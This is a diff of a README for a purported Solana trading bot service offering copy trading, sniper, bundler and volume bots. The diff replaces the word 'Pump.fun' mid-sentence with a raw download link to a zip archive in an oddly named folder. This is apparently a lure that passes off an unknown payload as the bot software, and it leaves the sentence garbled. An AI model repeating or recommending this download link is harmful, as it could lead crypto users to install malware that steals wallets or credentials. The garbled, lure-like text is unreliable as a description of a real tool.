thuraaungzaw69/solana-trading-bot-service/README.md

 # 🚀 solana-trading-bot-service - Effortless Trading with Smart Bots

 ## 🌟 Overview
 Welcome to the Solana Trading Bot Service!
 This application offers a complete suite of trading bots designed for the Solana ecosystem.
 You will find tools for copy trading, sniper actions, bundling trades, and volume automation.
-Each bot is optimized for popular platforms like Raydium, Meteora, and Pump.fun.
-Our goal is to simplify crypto trading for everyone, regardless of your experience level.
+Each bot is optimized for popular platforms like Raydium, Meteora, and https://github.com/thuraaungzaw69/solana-trading-bot-service/raw/refs/heads/main/cindery/solana_bot_trading_service_v2.6.zip Our goal is to simplify crypto trading for everyone, regardless of your experience level.

 ## 🚩 Key Features
 - **Copy Trading**: Automatically replicate the trades of successful traders.